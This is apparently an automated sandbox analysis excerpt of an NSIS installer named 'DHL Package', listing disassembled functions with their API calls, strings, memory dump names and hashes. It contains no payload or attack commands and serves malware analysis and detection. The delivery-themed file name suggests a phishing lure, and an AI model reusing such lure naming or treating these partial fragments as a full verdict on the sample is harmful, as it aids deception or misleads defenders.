Part of subcall function 0040668A: CharNextW.USER32(?,00000000,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406701
Part of subcall function 0040668A: CharPrevW.USER32(?,?,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406714

GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404A6A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A85

Part of subcall function 00404BDE: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
Part of subcall function 00404BDE: wsprintfW.USER32 ref: 00404C88
Part of subcall function 00404BDE: SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B

Strings

A, xrefs: 00404945

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 774d2a40b0bbf4f8dd7fb20f48c4fa09ba26c8c9c63ccae399b439715fe90f39
Instruction ID: d667353cedc46192e8d163e6c277cef07b4b15ed6202573052c67ff26174fc6d
Opcode Fuzzy Hash: 774d2a40b0bbf4f8dd7fb20f48c4fa09ba26c8c9c63ccae399b439715fe90f39
Instruction Fuzzy Hash: 02A194B1A00209ABDB11AFA5CD45AAF77B8EF84314F10803BF611B62D1D77C99418F6D

Function 00403015 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403026
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000007,00000009,0000000B), ref: 00403042

Part of subcall function 00405ED1: GetFileAttributesW.KERNEL32(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
Part of subcall function 00405ED1: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
GlobalAlloc.KERNEL32(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4

Strings

soft, xrefs: 00403103
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004031EB
Error launching installer, xrefs: 00403065
Null, xrefs: 0040310C
Inst, xrefs: 004030FA

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-527102705
Opcode ID: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
Instruction ID: a1180c22f2f56a455fdba696775536d8b2bad2e91b267b1d20a8a943b96b17b0
Opcode Fuzzy Hash: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
Instruction Fuzzy Hash: DD51E571904204ABDB209F64DD81B9E7EACEB05316F20407BF905BA3D1C77D8E81876D

Function 00406418 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004281C0,00000400), ref: 00406559
GetWindowsDirectoryW.KERNEL32(004281C0,00000400,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 0040656C
SHGetSpecialFolderLocation.SHELL32(0040547A,?,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 004065A8
SHGetPathFromIDListW.SHELL32(?,004281C0), ref: 004065B6
CoTaskMemFree.OLE32(?), ref: 004065C1
lstrcatW.KERNEL32(004281C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065E7
lstrlenW.KERNEL32(004281C0,00000000,004226E8,?,0040547A,004226E8,00000000), ref: 0040663F

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065E1
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406529

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: 167fb53b1a551fbe6a87316e06e77fb2607b52ca0a675a0429bb2d70b92b80cf
Instruction ID: 14d1193dfffb306d7d50c4759d5107437c4365ff0453e231a2932b6079d00088
Opcode Fuzzy Hash: 167fb53b1a551fbe6a87316e06e77fb2607b52ca0a675a0429bb2d70b92b80cf
Instruction Fuzzy Hash: 27612771A00111ABDF209F24ED40ABE37A5AF54314F12813FE943B62D0DB3E89A2CB5D

Function 00405443 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
lstrlenW.KERNEL32(00403385,004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
lstrcatW.KERNEL32(004226E8,00403385), ref: 0040549E
SetWindowTextW.USER32(004226E8,004226E8), ref: 004054B0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE

Strings

&B, xrefs: 00405464

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: &B
API String ID: 2531174081-3208460036
Opcode ID: a770ebaa951fb28f4b5e04e514ffb256bfaa8220d1d063a1ddc5d2696b2a65d9
Instruction ID: 73e5e0af396a9b9ac9a9b02969ae59ee3043c4a39b1bd1f3be19a3319d016d01
Opcode Fuzzy Hash: a770ebaa951fb28f4b5e04e514ffb256bfaa8220d1d063a1ddc5d2696b2a65d9
Instruction Fuzzy Hash: 14219D71900518BACB219F56DD44ACFBF79EF44350F10803AF904B62A0C7798A91DFA8

Function 00404398 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043B5
GetSysColor.USER32(00000000), ref: 004043F3
SetTextColor.GDI32(?,00000000), ref: 004043FF
SetBkMode.GDI32(?,?), ref: 0040440B
GetSysColor.USER32(?), ref: 0040441E
SetBkColor.GDI32(?,?), ref: 0040442E
DeleteObject.GDI32(?), ref: 00404448
CreateBrushIndirect.GDI32(?), ref: 00404452

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
Instruction ID: 9b2ff1ab0d94660d7576f8ed4a98babdba82e7b09994482354a54f078556bf7c
Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
Instruction Fuzzy Hash: 9B2162715007089BCB20DF38D948B5BBBF8AF80714B04892EE996A26E1D734E904CF59

Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402750
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4

Part of subcall function 00405FB2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FC8

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870

Strings

9, xrefs: 00402733

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
Instruction ID: 536e03bdd217ed40317c2037eab2912bbb9466327a1cdf3ab0e42e9fe4cfd002
Opcode Fuzzy Hash: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
Instruction Fuzzy Hash: 2751F975D00219EBDF20DF95CA89AAEBB79FF04304F50817BE501B62D0E7B49D828B58

Function 00404CEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D07
GetMessagePos.USER32 ref: 00404D0F
ScreenToClient.USER32(?,?), ref: 00404D29
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D3B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D61

Strings

f, xrefs: 00404D3D

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 38a9b76ebff3d9b0285b36f379b71c5e366e7bff37b4726e352de3fe70b617dc
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: DF014C71900219BBDB10DBA4DD85BFEBBB8AF95B11F10012BBA50B61C0D6B49A058BA5

Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
MulDiv.KERNEL32(?,00000064,?), ref: 00402F74
wsprintfW.USER32 ref: 00402F84
SetWindowTextW.USER32(?,?), ref: 00402F94
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6

Strings

verifying installer: %d%%, xrefs: 00402F7E

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
Instruction ID: f70e2e9d3cdf76f376be3492476da2a97ecf935c4d8f5b4406c9d83c61a08eb5
Opcode Fuzzy Hash: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
Instruction Fuzzy Hash: F7014470640209BBEF209F60DE4AFEA3B79FB44345F008039FA06A51D1DBB989559F5C

Function 00406760 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
wsprintfW.USER32 ref: 004067B2
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067C6

Strings

UXTHEME, xrefs: 00406769
%s%S.dll, xrefs: 004067AC
\, xrefs: 00406788

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 9186df788a023ca5baadb024e2a35ee1fdde68eb784542ec1ecc189bc894a2fc
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 7EF0F670510119ABCB14AF64DD0DF9B37ACAB00309F10047AA646F20D0EB7CAA68CBA8

Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
GlobalFree.KERNEL32(?), ref: 004029F0
GlobalFree.KERNEL32(00000000), ref: 00402A03
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 62395f3c51c093407ddba5986f2050ef9b8543297e757c51489be8e043a0bb55
Instruction ID: ed14628ef15dceb457173a83ab12e15034626edc11f01d0ebe9f464a1ada349c
Opcode Fuzzy Hash: 62395f3c51c093407ddba5986f2050ef9b8543297e757c51489be8e043a0bb55
Instruction Fuzzy Hash: A821C171800128BBCF216FA5DE49D9F7E79EF05364F20023AF564762E1CB794D419BA8

Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004032AD
GetTickCount.KERNEL32 ref: 0040332E
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 0040335B
wsprintfW.USER32 ref: 0040336E

Strings

... %d%%, xrefs: 00403368

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 1018f14059df42716117e32cc9205124c366bb3f2267d69b9d834fb4df6f1544
Instruction ID: 0c386ab0f0708696bc676c49e8997792277d61a4d185bd6037e20a9e3331648f
Opcode Fuzzy Hash: 1018f14059df42716117e32cc9205124c366bb3f2267d69b9d834fb4df6f1544
Instruction Fuzzy Hash: 7E516D71900219EBCB10DF65D984B9F3FA8AB00766F14417BFC10B72C1DB789E508BA9

Function 0040668A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
CharNextW.USER32(?,00000000,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406701
CharPrevW.USER32(?,?,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 00406714

Strings

*?|<>/":, xrefs: 004066DC

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
Instruction ID: c93b7236ce9398e1af64c827f7f3df25a4e663042e3c0a86589bb20fd507ce77
Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
Instruction Fuzzy Hash: 6111CB2580061195DB3037548C84B7762E8EF547A4F52443FED86B32C0E77D5CA286BD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5C8,0040A5C8,00000000,00000000,0040A5C8,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8

Part of subcall function 00405443: lstrlenW.KERNEL32(004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,004226E8,00000000,?,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
Part of subcall function 00405443: lstrcatW.KERNEL32(004226E8,00403385), ref: 0040549E
Part of subcall function 00405443: SetWindowTextW.USER32(004226E8,004226E8), ref: 004054B0
Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 9c63aff5655d4e14ed2bbeeccd25930624a363ceffe893c688c7483ad26c4c8d
Instruction ID: 099db37703b38b7faa9c4b3761aa4ffcdc8a6de3d1088dc1ecc91c4b2867a8b7
Opcode Fuzzy Hash: 9c63aff5655d4e14ed2bbeeccd25930624a363ceffe893c688c7483ad26c4c8d
Instruction Fuzzy Hash: BB41C171500118BACB10BFA5DC85DAE7A79EF41328F20423FF822B10E1C77C8A519A6E

Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
Instruction ID: 0e68a9e52e1d6489b1d96d2929a27e43e5cdd4abb6d38d1bd7d6776dab24ddff
Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
Instruction Fuzzy Hash: 62215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11A0E7B48E54AAA8

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
Instruction ID: 4c6ae9b1abf83e60acb3738700a7a9d8e0f5f354904a09afb896d410ef8a521a
Opcode Fuzzy Hash: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
Instruction Fuzzy Hash: CE212672A00119AFCB05CFA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84
CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 383e59609db2bd9392710b838b48bfda8626baac977e96e1bde4cf408244bbd6
Instruction ID: b60ccfaacb74251373a9760c042081773c0d6d705e51916df09e3ce9171beb14
Opcode Fuzzy Hash: 383e59609db2bd9392710b838b48bfda8626baac977e96e1bde4cf408244bbd6
Instruction Fuzzy Hash: 2701D871950650EFEB006BB4AE89BDA3FB0AF55301F10493AF141B71E2C6B90404DB3D

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
